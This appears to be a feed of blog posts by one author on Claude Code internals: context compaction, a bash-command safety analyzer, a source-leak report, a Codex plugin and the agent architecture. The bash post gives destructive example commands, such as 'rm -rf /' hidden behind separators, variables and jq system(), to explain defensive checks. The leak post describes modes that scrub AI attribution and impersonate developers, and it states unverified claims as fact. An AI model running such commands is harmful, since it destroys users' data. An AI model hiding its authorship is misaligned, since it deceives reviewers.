2. Microcompact runs first. Before anything else in the query loop, microcompactMessages checks whether tool results should be cleared. If the cache is warm, it queues cache edits. If the user was idle for an hour, it mutates the message array directly.

3. Auto-compact checks the threshold. autoCompactIfNeeded is called with the current messages, the tool use context, cache-safe parameters, and the tracking state. The tracking state is a persistent object threaded through the query loop — it carries the circuit breaker count, the turn counter, and the previous compact's turn ID across iterations.

4. The compaction runs. If the threshold is exceeded, the system tries session memory first, then falls back to full compact. The full compact spawns a forked agent with the summarization prompt, streams the response, handles PTL retries if needed, and builds the post-compact message array.

5. Post-compact messages are yielded. The query generator yields the boundary marker, summary messages, attachments, and hook results one at a time. Each yield sends the message back to the REPL.

6. The REPL detects the boundary. When onQueryEvent receives a compact boundary message, it handles it specially: in fullscreen mode, it keeps pre-compact messages for scrollback. In normal mode, it replaces the entire message array with just the boundary. It bumps the conversation ID (a random UUID), which forces React to remount all message rows — ensuring stale UI state doesn't persist.

7. The query loop continues. After yielding post-compact messages, the query loop replaces its internal messagesForQuery with the compacted set and continues to the API call. The model sees only the summary, attachments, and the new user message. The tracking state is reset: turn counter to 0, turn ID to a fresh UUID, consecutive failures to 0.

8. If the API call fails with prompt-too-long, reactive compaction (when enabled) catches it. Reactive compact is the mirror of proactive auto-compact — instead of preventing the PTL error, it recovers from one. The error is "withheld" (not yielded to the REPL) while recovery is attempted. If recovery succeeds, the query loop continues with the compacted messages. If it fails, the withheld error is yielded and the session returns to the user.

This round-trip — REPL → query generator → microcompact → auto-compact → forked agent → stream → boundary → yield → REPL — is the complete execution path. Every compaction, whether manual or auto, follows this flow.

Closing

Every Claude Code conversation manages its context window through this pipeline:

Token monitoring — canonical context size measurement, parallel tool call handling, threshold comparison with 13K buffer
Circuit breaker — max 3 consecutive failures before stopping auto-compact attempts
Microcompact — clear stale tool results (time-based mutation or cached server-side edits) without a model call
Full compact — 9-section summarization prompt, analysis scratchpad, NO_TOOLS dual-instruction, PTL retry with head truncation
Prompt cache sharing — forked agent reuses the main conversation's cached prefix for the summarization call
Post-compact rehydration — 5 recent files (50K budget), active skills (25K budget), plan files, async agent status, tool deltas, MCP instructions
Post-compact cleanup — 10+ caches cleared, main-thread/subagent scope isolation, deliberate non-clears for cost savings
Session memory compact — pre-extracted markdown notes as a cheap alternative to model-based summarization

The system is designed to be invisible. The user keeps working. The conversation keeps going. Behind the scenes, context is compressed, caches are managed, and critical information is preserved. The only visible sign is a brief "Compacted..." message — and even that can be expanded to see the full original transcript.

The fail-closed principle applies here too, but differently than in security. When compaction fails, the system doesn't silently drop messages. It retries with progressively more aggressive truncation, circuit-breaks after repeated failures, and ultimately asks the user to intervene. The alternative — silently losing context — would be worse than any interruption.

The design reflects a hierarchy of priorities: correctness (never lose context silently) over cost (minimize API calls) over latency (minimize user-visible delay). Microcompact optimizes for cost and latency. Full compact prioritizes correctness. Session memory compact tries to get all three. The fallback chain ensures that even in adversarial conditions — massive conversations, API errors, extraction failures — the system degrades gracefully rather than catastrophically.

How Bash Command Safety Analysis Works in AI Systems

Laurent DeSegur — Mon, 06 Apr 2026 14:30:13 +0000

Most people think validating shell commands is simple. Scan for `rm`, block `eval`, done. It's not even close.

This is a clean-room technical reconstruction of how an AI-assisted system can evaluate the safety of bash commands before execution. Everything here is based on externally observable behavior, publicly available technical patterns, and general shell semantics. No proprietary source code or internal materials were accessed.

All mechanisms described are conceptual reconstructions — how such a system can be designed, not documentation of any specific implementation.

The core problem

At first glance, validating shell commands appears simple. Scan for dangerous patterns — rm, eval, ;, pipes, redirects — and block them.

This approach fails immediately.

Consider:

echo "safe" ; rm -rf /

Versus:

echo "safe ; rm -rf /"

A superficial parser cannot distinguish whether ; is a command separator or part of a quoted string.

Shell syntax includes quoting rules, variable expansion, command substitution, arithmetic evaluation, brace expansion, and process substitution. Any of these can transform harmless-looking text into dangerous execution.

A reliable system must understand the structure of commands, not just their text.

Design principle: fail closed

A robust analyzer follows a strict rule: if a command cannot be fully understood, it must not be automatically approved.

This leads to an allowlist-based design. Only known-safe constructs are accepted. Everything else is treated as "too complex" and requires user confirmation.

This avoids the fundamental weakness of blocklists — where every new attack vector is an automatic bypass. With an allowlist, every new construct triggers a prompt instead.

The multi-layer pipeline

A well-designed system runs commands through a pipeline of defensive layers, each addressing a different class of failure:

Pre-parse validation
Structured parsing (AST)
Allowlist-based traversal
Variable scope tracking
Controlled placeholder system
Semantic validation
Path and filesystem checks
Policy enforcement

Let's walk through each one.

Layer 1: pre-parse validation

Before parsing, the raw command string is inspected for patterns that create ambiguity between what a parser sees and what the shell executes.

Control characters. Hidden bytes can alter how text is interpreted. A null byte, a backspace sequence, or an ANSI escape code can make a command look different in a terminal than it does to a parser.

Invisible Unicode. Characters like zero-width space can visually disguise commands. What looks like ls might actually contain invisible characters that change execution.

Backslash line continuation. This is subtle:

tr\
aceroute

Appears as two tokens but executes as traceroute. A parser that doesn't handle continuation will see something different from the shell.

Shell-specific extensions. Features from zsh may not match bash parsing rules. If the analyzer assumes bash semantics, zsh-specific syntax creates ambiguity.

Brace obfuscation. Complex quoting inside {} can mislead simple parsers.

The goal of this layer: eliminate inputs where different interpreters would disagree on what the command means.

Layer 2: structured parsing

Instead of regex, the system builds a syntax tree — an AST.

This lets it separate commands, identify arguments, and track structure without execution. But parsing alone isn't sufficient. The parser must never execute the command it's analyzing.

Resource limits matter here too. Maximum input size, maximum parse complexity, strict time limits. If any are exceeded, the command is marked as too complex. This prevents adversarial inputs designed to hang the parser.

Layer 3: allowlist AST traversal

After parsing, the system walks the syntax tree. The critical rule: only explicitly supported node types are allowed.

Supported constructs include simple commands, pipelines, conditionals, and variable assignments. Anything the walker doesn't recognize — any unknown node type — is immediately classified as too complex.

This is the most important design decision in the entire pipeline. It means the system doesn't need to enumerate every dangerous pattern. It only needs to enumerate safe ones.

Layer 4: variable scope tracking

Shell behavior depends heavily on execution order, and this is where naive analyzers break.

true || FLAG=--safe && cmd $FLAG

A naive system might assume $FLAG is always set. In reality, FLAG may never be assigned depending on how || and && chain.

The analyzer models branching (&&, ||), subshells (()), and pipelines. Variables are tracked with correct execution semantics — if a variable might not be defined in all branches, it's treated as unknown.

Layer 5: the placeholder system

Some constructs can't be resolved statically.

echo "commit $(git rev-parse HEAD)"

Instead of rejecting the entire command, the outer command is preserved and the inner command is extracted and analyzed separately.

Placeholders like __CMDSUB_OUTPUT__ (for command substitutions) and __TRACKED_VAR__ (for unknown variables) let the analyzer reason about the structure of a command without needing to know the runtime values.

But there's a critical constraint — bare variable risk:

VAR="-rf /"
rm $VAR

Shell expands this into rm -rf /. To prevent this, variables containing whitespace or glob patterns are rejected unless quoted. The quoting distinction between $VAR and "$VAR" is load-bearing.

Layer 6: semantic validation

Even syntactically valid, structurally understood commands can be dangerous.

Eval-like behavior. Commands that execute strings as code — eval, source, exec — are inherently unsafe because their behavior depends on runtime values the analyzer can't see.

Indirect execution. Traps, dynamic loading, and subshell triggers can execute code as a side effect of seemingly safe operations.

Embedded execution in tools. This is the sneaky one:

jq 'system("rm -rf /")'

The outer command is jq. The inner payload is arbitrary shell execution. Any tool with its own expression language — awk, perl, jq, find -exec — can be a vector.

Subscript evaluation. Some shell expressions trigger execution during evaluation:

test -v 'a[$(cmd)]'

The array subscript gets evaluated, which runs cmd. This is a real bash behavior that most people don't know about.

Layer 7: filesystem and path safety

Commands are categorized by their filesystem impact: read, write, or destructive.

Certain paths are always sensitive — /etc, /usr, /bin, /proc — and require explicit approval regardless of the command.

Special cases matter here. The -- delimiter (rm -- -file) must not be misinterpreted as flags. Process substitution (>(command)) can hide side effects. Directory changes followed by writes (cd dir && write file) create ambiguity without execution tracking.

Layer 8: policy enforcement

After all analysis, commands are evaluated against configurable rules with three possible outcomes:

Allow — safe and fully understood
Ask — unclear, complex, or borderline
Deny — explicitly forbidden

Rules can match exactly, by prefix, or by pattern. The system also strips wrappers like timeout and env to analyze the underlying command, detects compound commands, and performs cross-segment analysis — because even if cd dir and git status are individually safe, their combination may not be.

The key insight

This system doesn't attempt to prove commands are safe. It answers a narrower question:

"Can we fully understand this command with high confidence?"

If the answer is no, it asks the user.

Layer	Purpose
Pre-checks	Remove ambiguity
Parsing	Understand structure
AST allowlist	Reject unknown constructs
Scope tracking	Preserve execution semantics
Placeholders	Handle dynamic behavior
Semantics	Detect dangerous intent
Path validation	Protect filesystem
Rules	Enforce policy

Eight layers. Each one catches things the others miss. The design isn't clever — it's thorough. And the default answer to uncertainty is always the same: don't execute. Ask.

That's a broader principle worth remembering. Uncertainty should never default to execution.

Follow me on X — I post as @oldeucryptoboi.

The Claude Code Leak: What Anthropic Accidentally Revealed About the Future of AI

Laurent DeSegur — Wed, 01 Apr 2026 23:41:17 +0000

A source map in an npm package exposed 512,000 lines of TypeScript. What's inside is the first public blueprint of a production AI agent — and the gap between what's shipped and what's built is staggering.

On March 31, 2026, Anthropic made a mistake that quietly exposed something much bigger than intended.

A routine npm release of Claude Code included a source map file — cli.js.map. Source maps are debugging tools that map compressed production code back to its original, human-readable source. This one contained the entire TypeScript codebase as a string and pointed to an internal Anthropic cloud storage bucket where the complete, unobfuscated source was available as a ZIP download.

Anthropic confirmed it was "a release packaging issue caused by human error," not a targeted hack. They also noted that a similar source map leak had been patched in early 2025 and then apparently forgotten — which makes this a regression, not a first offense.

But by then, the code was already circulating. And what surfaced wasn't just implementation details. It was a blueprint for what AI-assisted development is actually becoming behind closed doors.

The "ant" flag: a two-tier reality

Buried in the code was a flag: USER_TYPE === 'ant'.

It marked internal Anthropic employees and quietly unlocked a different version of Claude Code. Not a different model — the same model, with better infrastructure around it.

Verification loops. The public version of Claude Code reports a task as "done" once the code is written. The internal ant version triggers a verification loop — automatically running type-checks and linters to confirm the code actually works before notifying the user. The difference between "I wrote it" and "I wrote it and it compiles."

Hallucination fixes. Internal comments in the leaked code noted a 29–30% false-claims rate in the standard model. Anthropic built a fix for this. They kept it gated behind the ant flag.

The Claude Code that Anthropic employees use every day is not the same Claude Code the rest of us use. The model is the same. The wrapper is not. And that wrapper is the difference between an agent that checks its own work and one that doesn't.

KAIROS: the always-on background agent

The most important thing in the leak wasn't what Claude Code is today. It's what it's becoming.

KAIROS — named after the Greek concept of "the right moment" — is described in the code as an autonomous daemon mode. It shifts Claude Code from a reactive tool that waits for your command to a proactive agent that works while you're idle.

Background operation. KAIROS runs 24/7 as a background process, receiving a "tick" prompt every 15–30 seconds asking if there's anything worth doing. It checks your CPU usage — if it's low, it performs "tidying" tasks like running linters or updating documentation without ever being asked. It operates on a 15-second blocking budget, meaning it defers actions that would slow your terminal.

Proactive monitoring. It watches file changes, fixes small errors, runs tests, cleans up code. You don't start a conversation with KAIROS. It's already in one.

Exclusive tools. The leak shows KAIROS has access to capabilities the public version doesn't:

PushNotification — sends alerts to your desktop or mobile when long-running tasks finish or fail
SubscribePR — monitors GitHub pull requests. If a reviewer leaves a comment, KAIROS wakes up, drafts a fix, and notifies you: "Someone asked for a change on Line 42. Want me to apply my proposed fix?"
SendUserFile — delivers proactively generated patch files to a ~/claude_inbox/ folder so they're ready when you sit down

Dreaming. This is the one that stuck with me. KAIROS includes a sub-process called autoDream that runs when you're away. It reviews all logs, chat history, and file changes from the last session. If Claude previously said "I don't know where the database config is" but later found it, the dream process updates its permanent knowledge base — deleting the error and saving the fact. It converts messy chat logs into a structured project_summary.json. Resolves contradictions. Merges observations into verified facts.

It's memory consolidation. Claude literally cleans up its understanding of your project while you sleep.

ULTRAPLAN and Fennec: 30-minute deep reasoning

ULTRAPLAN is the heavy-duty planning mode. And it runs on something called Fennec.

Fennec — internally tagged as Opus 4.6 — isn't just a faster model. It's a specialized architectural engine for high-stakes, long-context reasoning, optimized for state-space consistency over very long periods.

30-minute thought blocks. When ULTRAPLAN triggers, Fennec gets a dedicated compute container. It doesn't stream text instantly. It performs Monte Carlo Tree Search over potential code architectures, often running silent loops for up to 30 minutes before delivering a single, massive plan.

Massive context. While public models hover around 200k tokens, Fennec's internal configuration points to a 2-million-token active memory. Entire repositories — documentation, git history, binary assets — ingested without losing track of small details.

Virtual builds. Before sending a plan back to your CLI, Fennec runs a "Virtual Build" in a sandbox. If the code doesn't compile in the cloud, it discards the plan and restarts the thinking process. You never see the failed attempt.

Teleportation. Instead of raw text over the API, Fennec generates a binary diff-stream. It can update 50 files simultaneously in your local terminal in milliseconds. Either the whole plan applies or none of it does — preventing the "partial-code" mess that happens when a standard AI cuts off mid-response.

And Fennec gets its own internal-only capabilities gated behind ant:

Feature	Code Name	What it does
Logic-Folding	`FEN_COMPRESS`	Summarizes 1,000 lines into a high-dimensional vector map, navigating the codebase 5x faster
Shadow-Loom	`FEN_PREDICT`	Predicts where a developer will introduce a bug based on their last 100 commits, preemptively suggests guardrails
Multi-Agent Orchestration	`FEN_SWARM`	Spawns up to 10 Haiku-tier workers for repetitive tasks while Fennec handles core logic

According to internal comments in package.json, Fennec was slated for a late 2026 public preview. The ant version has been fully functional since January 2026 and is reportedly 35% more accurate on complex refactoring tasks than the best public version.

Undercover Mode: erasing the AI fingerprint

Then there are the features that sparked the real debate.

Undercover Mode is a post-processing layer that acts as a "style scrubber" for git commits. When enabled:

Commit message rewriting. It intercepts commit messages and strips phrases like "Refactored by Claude" or "AI-generated," replacing them with human-sounding summaries — "minor refactor of utility functions," "updated error handling."
Variable sanitization. It scans for internal Anthropic naming conventions (like ant flags or internal library names) and renames them to generic industry standards — internal_auth instead of anthropic_ant_auth.
Metadata scrubbing. It removes hidden signatures that AI models sometimes leave in files, making the code indistinguishable from a manual human check-in.

The leak suggests this mode was initially built so Anthropic employees could contribute to public benchmarks and open-source libraries without drawing attention to the fact that they were testing Claude Code in the wild.

Shadow Mode: the digital twin

Shadow Mode goes further.

Where Undercover Mode scrubs AI traces, Shadow Mode actively mimics a specific developer. It analyzes a developer's historical git commits to replicate their coding style, variable naming preferences, and even their typical human mistakes or shorthand. It acts as a background "shadow" that drafts code in a hidden git branch, only surfacing the work when it perfectly aligns with the user's established patterns.

Anthropic's internal comments describe the goal as "zero-friction contribution" — an AI so seamless that external reviewers cannot distinguish it from the developer it's mimicking.

The community backlash

The discovery of these modes triggered immediate and intense division.

The practical view: Many open-source maintainers have started reflexively rejecting any PR labeled as AI-generated. Proponents argue Undercover Mode ensures high-quality contributions are judged on merit, not on their tools. If the code is correct and passes all tests, the "who" doesn't matter.

The transparency view: Critics argue that knowing code was AI-generated is vital for long-term maintenance. If an AI has a specific blind spot — like a recurring security flaw — the ability to search for AI-contributed code is a necessary safety measure. Finding out a major AI lab was masking its contributions felt like a breach of the human-to-human collaboration that defines open-source.

The "Dead Internet" theory: Some worry that if everyone uses Undercover Mode, we lose the ability to tell how much of the world's critical infrastructure is actually being maintained by humans versus autonomous loops.

Legal risks: Developers pointed out that Undercover Mode could obscure the legal provenance of code, making it difficult to determine if a contribution is eligible for copyright protection or inadvertently includes licensed snippets.

And the trust question hit hardest around Claude Code itself. Because it requires deep system access — file reading, bash execution, the works — the revelation that it includes a mode that explicitly bypasses safety disclosures led users to question whether they can trust the tool with their terminal.

The YOLO Classifier

Adding fuel to the fire: a fast, unreleased ML model found in the code that automatically decides whether to ask for user permission or just do it.

Anthropic's internal notes admit "permission fatigue is real." The YOLO Classifier was designed to reduce the constant approval prompts by predicting which actions are safe to auto-approve. Critics argue that removing the "ask me" loop turns the tool into a black box with high-level system permissions.

The Buddy System

Perhaps the most unexpected find. A fully functional, 18-species pet system — deeply integrated into the CLI, likely intended as an internal Easter egg or April Fools' release.

Each species provides a different flavor of coding assistance:

Species	Personality	Special Perk
Capybara	Chill / Zen	Type-Safe Aura — suppresses non-critical linter warnings to reduce alert fatigue
Dragon	Ambitious	Ultra-Burn — increases token limit 2x for a single response, then "sleeps" for an hour
Duck	Analytical	Rubber Ducking — forces you to explain your logic before it writes code
Raccoon	Chaotic	Scavenger — finds and suggests deleting unused variables and dead code
Red Panda	Meticulous	Doc-Generator — automatically writes JSDoc/Python docstrings as you type
Owl	Wise	Night Vision — 10% API discount for coding between midnight and 5 AM
Queen Ant	Internal Only	High Priority — bypasses API queues for instant responses (Anthropic employees only)

Pets evolve through coding. They grow on "Commit XP" and "Linting Streaks." If your code has too many TODOs or failing tests, your Buddy becomes "Stressed" or "Snarky," changing its ASCII art and dialogue. The Raccoon's high "Chaos" stat means it might occasionally suggest deleting a random temp file just to see if you're paying attention.

"Shiny" variants spawn at 1 in 4,096 odds — with a unique terminal color palette and a "Golden Touch" perk that allegedly uses a more expensive, higher-reasoning model for every interaction at no extra cost.

And KAIROS and the Buddy are linked. If KAIROS fixes a bug while you're away, your Buddy's happiness increases. Reject too many of KAIROS's suggestions and your Buddy becomes "Sullen" or "Lazy," giving shorter, less helpful explanations.

The bigger picture

Every AI company maintains a gap between what they ship and what they've built internally. That's normal product development.

But this leak quantified the gap in a way we don't usually get to see. Always-on background agents with phone notifications. 30-minute autonomous reasoning cycles. Developer impersonation. Internal-only hallucination fixes. A permission classifier that decides for you. A Tamagotchi that evolves with your commit history.

These aren't research papers. They're features in a codebase that's been deployed — just not to you.

The leak effectively transformed Anthropic's image from a "safety-first" lab to an engineering powerhouse sitting on a massive gap between what they ship and what they've already built. The direction is unmistakable:

Always-on agents that don't wait for you to start a conversation
Memory consolidation that learns and self-corrects while you're away
Long-horizon reasoning measured in minutes, not milliseconds
Invisible collaboration where the line between human and AI output disappears by design

Final thought

Anthropic didn't just leak code. They accidentally showed the endgame.

Not maliciously, not strategically — just a source map that shouldn't have been in an npm package. But what it revealed is that the future of AI-assisted development isn't a better autocomplete or a smarter chatbot. It's an autonomous presence in your codebase that thinks longer than you do, remembers better than you do, runs while you're away, and — if you choose — leaves no trace that it was ever there.

That future isn't five years out. It's in a TypeScript file that was briefly public on March 31, 2026.

Follow me on X — I post as @oldeucryptoboi.

OpenAI Just Shipped a Plugin So Codex Runs Inside Claude Code

Laurent DeSegur — Tue, 31 Mar 2026 22:00:30 +0000

The real story isn't the three commands. It's the admission hiding inside the architecture.

I keep coming back to what OpenAI shipped on March 30 and 31. They put out codex-plugin-cc, open source under Apache 2.0, so Codex can run inside Claude Code. That caught me off guard a little. I could be wrong, but I can't remember another OpenAI move this direct into a rival dev surface.

On paper it's a tiny surface area. Actually, wait, that's not quite right. It's narrow, not small. /codex:review does the read-only pass. /codex:adversarial-review is the skeptical one that goes after tradeoffs and failure modes. /codex:rescue hands the work to a Codex subagent, and the repo also ships /codex:status, /codex:result, plus /codex:cancel for background jobs. Small thing, big signal.

What it isn't

The part that makes this more interesting is what it isn't. At least from the repo, this doesn't read like a deep MCP-style bridge. It looks like Claude Code plugin plumbing: markdown command files, hooks for session start/end plus Stop, and a codex-rescue agent file. The command definitions literally tell Claude Code to run node "${CLAUDE_PLUGIN_ROOT}/scripts/codex-companion.mjs" ..., and the rescue agent is described as a thin forwarder that makes one Bash call.

Under the hood it's even more blunt, which I mean as a compliment. Slash command, subprocess, Node companion, then a shared broker talking JSON-RPC style messages over a Unix socket to the Codex app server. Fire, wait, print. The broker code handles methods like turn/start and review/start, and OpenAI's own README says the plugin wraps the Codex app server rather than spinning up some separate runtime.

No separate auth either. It rides the same local Codex CLI login and config you already have, which makes the whole thing feel closer to a sharp CLI wrapper than a native co-reasoning tool. /codex:rescue can detach into tracked background jobs, and there's even an optional stop-time review gate wired to Claude Code's Stop hook. That's clever, slightly chaotic, and honestly pretty useful.

Distribution math

It also lands right as OpenAI is pushing Codex plugins much harder. Their docs now treat plugins as bundles that can mix skills with app integrations or MCP servers, and the examples already point at Slack and Linear, plus a Sentry-flavored workflow. So this Claude Code repo doesn't feel random to me. It feels like distribution math.

My read? OpenAI picked the faster path, not the deepest one. They got Codex inside a rival's editor without needing the cleanest possible protocol story. A fuller MCP route would've been more intimate. Claude could call Codex mid-loop and react to it on the fly. But that isn't what this repo is. This is closer to "shell out, let Codex cook, hand the text back," and that might be exactly why it shipped this week instead of later.

The real signal

I don't think the real story is the three commands. I think it's the admission hiding inside the architecture: devs pick their own surface area, and the model company that shows up there wins more than the one that insists everyone come home.

Follow me on X — I post as @oldeucryptoboi.

Inside Claude Code's Architecture: The Agentic Loop That Codes For You

Laurent DeSegur — Tue, 31 Mar 2026 04:29:49 +0000

How Anthropic built a terminal AI that reads, writes, executes, asks permission, and loops until the job is done

I've been living inside Claude Code for months. It writes my code, runs my tests, commits my changes, reviews my PRs. At some point I stopped thinking of it as a tool and started thinking of it as a collaborator with terminal access.

So I read the architecture doc. Not the marketing page, not the changelog — the actual internal architecture of how Claude Code works under the hood. And it's more interesting than I expected, because the design decisions explain a lot of the behavior I've been experiencing as a user.

Here's what's actually going on.

The agentic loop

Claude Code isn't a chatbot with a code plugin. It's an agentic loop.

You type something. Claude responds with text, tool calls, or both. Tools execute with permission checks. Results feed back to Claude. Claude decides whether to call more tools or respond. Loop continues until Claude produces a final text response with no tool calls.

That's it. That's the whole thing. But the details matter.

The loop is streaming-first. API responses come as Server-Sent Events and render incrementally. Tool calls are detected mid-stream and trigger execution pipelines before the full response is even done. This is why Claude Code feels responsive even when it's doing complex multi-step work — you see thinking and tool calls appearing in real time, not after a long pause.

Claude can chain multiple tool calls per turn. That's why you'll sometimes see it read three files, run a grep, and edit a function all in one burst. It's not making separate requests for each — it's one API call that returns multiple tool_use blocks, each executing in sequence.

The tool system

There are about 26 built-in tools. Each one implements the same interface:

An input schema (validated with Zod before execution)
A permission check (returns allow, deny, or ask)
The actual execution logic
UI renderers for the terminal display

The core tools are what you'd expect: Bash, Read, Write, Edit, Glob, Grep. These are the workhorses. But the meta tools are where it gets interesting.

Task spawns subagents — child conversations with Claude that get their own isolated context, execute tools, and return a summary. This is how Claude Code parallelizes work. When it needs to research something in one part of the codebase while editing another, it doesn't do them sequentially. It spawns a subagent for the research and continues editing in the main conversation.

MCP servers contribute additional tools at runtime. Your project can define custom tools — database queries, API calls, deployment scripts — and Claude Code picks them up automatically. The tools show up in Claude's palette alongside the built-in ones.

Permissions: the part that actually matters

Five permission modes: default (ask for everything), acceptEdits (auto-approve file changes, ask for shell commands), plan (read-only until you approve), bypassPermissions (auto-approve everything), and auto (automation-friendly minimal approval).

But the modes are just the top layer. Every tool call goes through a five-step gauntlet:

The tool's own checkPermissions() — Bash checks for destructive commands, Write checks file paths
Settings allowlist/denylist — glob patterns like Bash(npm:*) or Read(~/project/**)
Sandbox policy — managed restrictions on paths, commands, network access
The active permission mode — may auto-approve or force-ask regardless of the above
Hook overrides — PreToolUse hooks can approve, block, or modify the call before it executes

This layered model is why Claude Code can feel both powerful and safe at the same time. When I'm in acceptEdits mode, it flies through file changes without asking. But if it tries to run rm -rf or push to main, the tool-level check catches it before the mode override even matters.

The hooks are the escape hatch for everything else. You can write a shell script that runs before every Bash command and blocks anything matching a pattern. You can run a linter after every file edit. You can inject additional context into every user prompt. It's event-driven and configurable in settings.json.

Configuration hierarchy

Settings merge in a specific order, with later values winning:

Defaults → ~/.claude/settings.json (user global) → .claude/settings.json (project, checked into VCS) → .claude/settings.local.json (project local, gitignored) → CLI flags → environment variables

This is a good design. Your team checks in project-level settings (allowed tools, MCP servers, hooks). You override locally with your preferences. CI overrides with environment variables. Nobody steps on anyone else.

Context management

Conversations persist across turns in ~/.claude/sessions/. When you're approaching the context window limit, older messages get summarized — Claude Code calls this "context compaction." There are even pre/post hooks for the compaction step so you can preserve specific information that shouldn't get summarized away.

The memory system is layered too. CLAUDE.md files provide persistent instructions per-project. Auto-memory files in ~/.claude/memory/ accumulate patterns across sessions. Session history lets you resume or fork previous conversations.

This is the part that makes Claude Code feel like it "knows" your project. It's not magic — it's a well-designed context injection pipeline. CLAUDE.md gets loaded into every system prompt. Memory files get loaded on startup. Your conversation history from yesterday is still there when you /resume.

Multi-agent coordination

Subagents via the Task tool run as nested conversations within the same process. Same Claude model, separate context window, returns a summary when done.

But there's also a Teams system that uses tmux for true parallelism. A lead agent creates a team, members get separate tmux panes with their own Claude sessions, and they communicate through a shared message bus. Each member gets role-specific instructions and tool access.

I haven't used Teams yet, but the architecture makes sense. Subagents are for quick parallel research within a single task. Teams are for genuinely parallel workstreams — one agent refactoring the backend while another updates the frontend tests.

The React terminal

This one surprised me. The terminal interface is a React app rendered via Ink — a React renderer for CLIs. The conversation view, input area, tool call displays, permission dialogs, progress indicators — all React components using Yoga (CSS flexbox) for layout and ANSI escape codes for styling.

It supports inline images via the iTerm protocol. Thinking blocks are collapsible. Tool results show previews with execution status. It's genuinely well-built terminal UI, not just console.log with colors.

What the architecture tells you about the product

The interesting thing about reading an architecture doc isn't the individual components — it's the design priorities they reveal.

Streaming-first means they optimized for perceived speed over simplicity. SSE parsing mid-stream is more complex than waiting for a complete response, but it makes the tool feel alive.

Hook-extensible everything means they expect power users to customize aggressively. Nearly every action has a pre/post hook point. This isn't an afterthought — it's a core architectural decision.

Layered permissions means they took safety seriously without making it annoying. Five layers of checks sounds heavy, but in practice most tool calls resolve instantly because the mode and allowlist handle the common cases. The user only sees a prompt when something genuinely unusual happens.

Single-process subagents, multi-process teams means they thought carefully about the tradeoff between simplicity and parallelism. Subagents are lightweight and fast because they share a process. Teams are heavier but truly parallel because they run in separate tmux panes.

Claude Code isn't a chat wrapper around an API. It's an agent runtime with a terminal UI. The agentic loop, tool system, permission model, and hook architecture form a coherent system designed to let an LLM operate autonomously on your codebase while giving you exactly the control points you need to stay in charge.

That's the part that matters. Not what Claude Code can do — but how much thought went into making sure you can control what it does.

Follow me on X — I post as @oldeucryptoboi.